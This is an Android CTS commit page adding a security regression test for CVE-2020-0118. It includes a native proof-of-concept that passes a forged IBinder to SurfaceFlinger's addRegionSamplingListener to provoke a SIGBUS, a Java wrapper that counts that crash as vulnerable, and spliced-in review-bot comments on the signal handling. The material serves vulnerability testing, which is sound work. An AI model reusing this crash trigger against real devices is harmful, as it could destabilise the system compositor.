author | TreeHugger Robot <treehugger-gerrit@google.com> | 2022-01-20 00:30:01 +0000 |
---|---|---|
committer | Android (Google) Code Review <android-gerrit@google.com> | 2022-01-20 00:30:01 +0000 |
commit | 565871d50ce41598ac2af314fa785429e9fd69bf (patch) | |
tree | f2a421edbe24e175650c7037b00be168c0bb50d3 | |
parent | 0f96e72d9b3e3c1995531d4e668ba58bfe0b726c (diff) | |
parent | 954449089eb4c2e17e8b3374529aeee520c7ebc6 (diff) | |
download | cts-565871d50ce41598ac2af314fa785429e9fd69bf.tar.gz |
Merge "[RESTRICT AUTOMERGE] CTS test for Android Security b/150904694" into rvc-dev
3 files changed, 205 insertions, 0 deletions
diff --git a/hostsidetests/securitybulletin/securityPatch/CVE-2020-0118/Android.bp b/hostsidetests/securitybulletin/securityPatch/CVE-2020-0118/Android.bp
new file mode 100644
index 00000000000..967a0b78c7d
--- /dev/null
+++ b/hostsidetests/securitybulletin/securityPatch/CVE-2020-0118/Android.bp
@@ -0,0 +1,39 @@
+/*
+ * Copyright (C) 2021 The Android Open Source Project
+ *
+ * Licensed under the Apache License, Version 2.0 (the "License");
+ * you may not use this file except in compliance with the License.
+ * You may obtain a copy of the License at:
+ *
+ * http://www.apache.org/licenses/LICENSE-2.0
+ *
+ * Unless required by applicable law or agreed to in writing, software
+ * distributed under the License is distributed on an "AS IS" BASIS,
+ * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+ * See the License for the specific language governing permissions and
+ * limitations under the License.
+ *
+ */
+
+package {
+ default_applicable_licenses: ["Android-Apache-2.0"],
+}
+
+cc_test {
+ name: "CVE-2020-0118",
+ defaults: ["cts_hostsidetests_securitybulletin_defaults"],
+ srcs: [
+ "poc.cpp",
+ ],
+ header_libs: [
+ "libgui_headers",
+ "libsurfaceflinger_headers",
+ ],
+ shared_libs: [
+ "libbinder",
+ "libgui",
+ "liblayers_proto",
+ "libsurfaceflinger",
+ "libutils",
+ ],
+}
diff --git a/hostsidetests/securitybulletin/securityPatch/CVE-2020-0118/poc.cpp b/hostsidetests/securitybulletin/securityPatch/CVE-2020-0118/poc.cpp
new file mode 100644
index 00000000000..b6ce3147128
--- /dev/null
+++ b/hostsidetests/securitybulletin/securityPatch/CVE-2020-0118/poc.cpp
@@ -0,0 +1,124 @@
+/*
+ * Copyright (C) 2021 The Android Open Source Project
+ *
+ * Licensed under the Apache License, Version 2.0 (the "License");
+ * you may not use this file except in compliance with the License.
+ * You may obtain a copy of the License at:
+ *
+ * http://www.apache.org/licenses/LICENSE-2.0
+ *
+ * Unless required by applicable law or agreed to in writing, software
+ * distributed under the License is distributed on an "AS IS" BASIS,
+ * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+ * See the License for the specific language governing permissions and
+ * limitations under the License.
+ *
+ */
+
+#include "../includes/common.h"
+#include "SurfaceFlinger.h"
+#include "gui/IRegionSamplingListener.h"
+
+bool testInProgress = false;
+
+struct sigaction new_action, old_action;
+void sigbus_handler(int signum, siginfo_t *info, void *context) {
+ if (testInProgress && info->si_signo == SIGBUS) {
+ (*old_action.sa_sigaction)(signum, info, context);
+ return;
+ }
+ _exit(EXIT_FAILURE);
+}
+
+class NewBinder : public android::IBinder {
+public:
+ constexpr static uint32_t arraySize = 16;
+ constexpr static uint32_t elementValue = 0x11111111;
+ uint32_t arr[arraySize] = {};
+
+ NewBinder() {
+ for (uint32_t i = 0; i < arraySize; ++i) {
+ arr[i] = elementValue;
+ }
+ }
+
+ const android::String16 &getInterfaceDescriptor() const {
+ static android::String16 sEmptyDescriptor;
+ return sEmptyDescriptor;
+ }
+
+ bool isBinderAlive() const { return true; }
+
+ android::status_t pingBinder() { return android::NO_ERROR; }
+
+ android::status_t
+ dump(int /* fd */, const android::Vector<android::String16> & /* args */) {
+ return android::NO_ERROR;
+ }
+
+ android::status_t transact(uint32_t /* code */,
+ const android::Parcel & /* data */,
+ android::Parcel * /* reply */,
+ uint32_t /* flags */) {
+ return android::NO_ERROR;
+ }
+
+ android::status_t linkToDeath(
+ const android::sp<android::IBinder::DeathRecipient> & /* recipient */,
+ void * /* cookie */, uint32_t /* flags */) {
+ return android::NO_ERROR;
+ }
+
+ android::status_t unlinkToDeath(
+ const android::wp<android::IBinder::DeathRecipient> & /* recipient */,
+ void * /* cookie */, uint32_t /* flags */,
+ android::wp<android::IBinder::DeathRecipient> * /* outRecipient */) {
+ return android::NO_ERROR;
+ }
+
+ void attachObject(const void * /* objectID */, void * /* object */,
+ void * /* cleanupCookie */,
+ object_cleanup_func /* func */) {}
+
+ void *findObject(const void * /* objectID */) const { return nullptr; }
+
+ void detachObject(const void * /* objectID */) {}
+
+ android::BBinder *localBinder() { return nullptr; }
+
+ android::BpBinder *remoteBinder() {
+ return reinterpret_cast<android::BpBinder *>(this);
+ }
+};
+
+class Listener : public android::BnRegionSamplingListener {
+public:
+ void onSampleCollected(float /* medianLuma */) {}
+};
+
+int main() {
+ sigemptyset(&new_action.sa_mask);
+ new_action.sa_flags = SA_SIGINFO;
+ new_action.sa_sigaction = sigbus_handler;
+ sigaction(SIGBUS, &new_action, &old_action);
+
+ android::sp<Listener> listener = new Listener();
+ FAIL_CHECK(listener);
+
+ const android::Rect sampleArea{100, 100, 200, 200};
+ const android::sp<android::IBinder> &stopLayerHandle = new NewBinder();
+ FAIL_CHECK(stopLayerHandle);
+
+ android::sp<android::SurfaceFlinger> flinger =
+ android::surfaceflinger::createSurfaceFlinger();
+ FAIL_CHECK(flinger);
+
+ android::sp<android::ISurfaceComposer> composer = flinger;
+ testInProgress = true;
+ android::status_t status = composer->addRegionSamplingListener(
+ sampleArea, stopLayerHandle, listener);
+ testInProgress = false;
+ FAIL_CHECK(status == android::NO_ERROR);
+
+ return EXIT_SUCCESS;
+}
diff --git a/hostsidetests/securitybulletin/src/android/security/cts/CVE_2020_0118.java b/hostsidetests/securitybulletin/src/android/security/cts/CVE_2020_0118.java
new file mode 100644
index 00000000000..04c9a05df9f
--- /dev/null
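Review bot: `sigbus_handler` chains to `old_action.sa_sigaction` without anything establishing that it is callable: the return value of `sigaction(SIGBUS, &new_action, &old_action)` in `main()` is ignored, and the previous disposition may be `SIG_DFL` or a handler installed without `SA_SIGINFO`. In that case the chained call would itself fault, presumably with a different signal, and since the Java test added in this commit matches only SIGBUS, a vulnerable build could then be reported as not vulnerable. I would fail the test when `sigaction` returns non-zero, and in the handler replace the indirect call with `sigaction(signum, &old_action, nullptr); return;` so that the fault, which should recur once the handler returns, is delivered under the original disposition whatever it was. `testInProgress` is also read from the handler and would be better declared `volatile sig_atomic_t`.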
+++ b/hostsidetests/securitybulletin/src/android/security/cts/CVE_2020_0118.java
@@ -0,0 +1,42 @@
+/*
+ * Copyright (C) 2021 The Android Open Source Project
+ *
+ * Licensed under the Apache License, Version 2.0 (the "License");
+ * you may not use this file except in compliance with the License.
+ * You may obtain a copy of the License at
+ *
+ * http://www.apache.org/licenses/LICENSE-2.0
+ *
+ * Unless required by applicable law or agreed to in writing, software
+ * distributed under the License is distributed on an "AS IS" BASIS,
+ * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+ * See the License for the specific language governing permissions and
+ * limitations under the License.
+ */
+
+package android.security.cts;
+
+import android.platform.test.annotations.AsbSecurityTest;
+import com.android.compatibility.common.util.CrashUtils;
+import com.android.tradefed.testtype.DeviceJUnit4ClassRunner;
+import org.junit.runner.RunWith;
+import org.junit.Test;
+
+@RunWith(DeviceJUnit4ClassRunner.class)
+public class CVE_2020_0118 extends SecurityTestCase {
+
+ /**
+ * b/150904694
+ * Vulnerability Behaviour: SIGBUS in self
+ */
+ @AsbSecurityTest(cveBugId = 150904694)
+ @Test
+ public void testPocCVE_2020_0118() throws Exception {
+ String signals[] = {CrashUtils.SIGBUS};
+ String binaryName = "CVE-2020-0118";
+ AdbUtils.pocConfig testConfig = new AdbUtils.pocConfig(binaryName, getDevice());
+ testConfig.config = new CrashUtils.Config().setProcessPatterns(binaryName);
+ testConfig.config.setSignals(signals);
+ AdbUtils.runPocAssertNoCrashesNotVulnerable(testConfig);
+ }
+} |
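Review bot: The Javadoc on `testPocCVE_2020_0118` records only the bug id and "SIGBUS in self", which does not tell a maintainer what the native binary exercises or why SIGBUS is the only signal counted as a failure. I would extend it along the lines of `Runs the CVE-2020-0118 native PoC, which passes a hand-written IBinder subclass as the stop-layer handle to addRegionSamplingListener; a SIGBUS in the PoC process means the device is vulnerable.` and state that, with `setSignals(signals)` restricted to `CrashUtils.SIGBUS`, any other crash of the binary is not counted by this configuration. `String signals[]` would also read better as `String[] signals`.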